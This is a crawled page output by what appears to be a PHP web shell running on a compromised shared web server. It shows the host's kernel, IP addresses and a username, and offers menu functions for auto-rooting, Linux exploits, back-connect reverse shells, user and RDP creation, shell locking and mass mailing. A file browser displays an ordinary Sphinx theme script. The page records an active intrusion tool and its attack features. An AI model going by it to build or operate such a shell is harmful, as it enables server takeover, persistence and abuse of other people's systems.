Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
sphinx /
themes /
bizstyle /
static /
[ HOME SHELL ]
Name
Size
Permission
Action
background_b01.png
78
B
-rw-r--r--
bizstyle.css_t
10.05
KB
-rw-r--r--
bizstyle.js_t
1.14
KB
-rw-r--r--
css3-mediaqueries.js
14.59
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bizstyle.js_t
// // bizstyle.js // ~~~~~~~~~~~ // // Sphinx javascript -- for bizstyle theme. // // This theme was created by referring to 'sphinxdoc' // // :copyright: Copyright 2012-2014 by Sphinx team, see AUTHORS. // :license: BSD, see LICENSE for details. // $(document).ready(function(){ if (navigator.userAgent.indexOf('iPhone') > 0 || navigator.userAgent.indexOf('Android') > 0) { $("li.nav-item-0 a").text("Top"); } $("div.related:first ul li:not(.right) a").slice(1).each(function(i, item){ if (item.text.length > 20) { var tmpstr = item.text $(item).attr("title", tmpstr); $(item).text(tmpstr.substr(0, 17) + "..."); } }); $("div.related:last ul li:not(.right) a").slice(1).each(function(i, item){ if (item.text.length > 20) { var tmpstr = item.text $(item).attr("title", tmpstr); $(item).text(tmpstr.substr(0, 17) + "..."); } }); }); $(window).resize(function(){ if ($(window).width() <= 776) { $("li.nav-item-0 a").text("Top"); } else { $("li.nav-item-0 a").text("{{ shorttitle|e }}"); } });
Close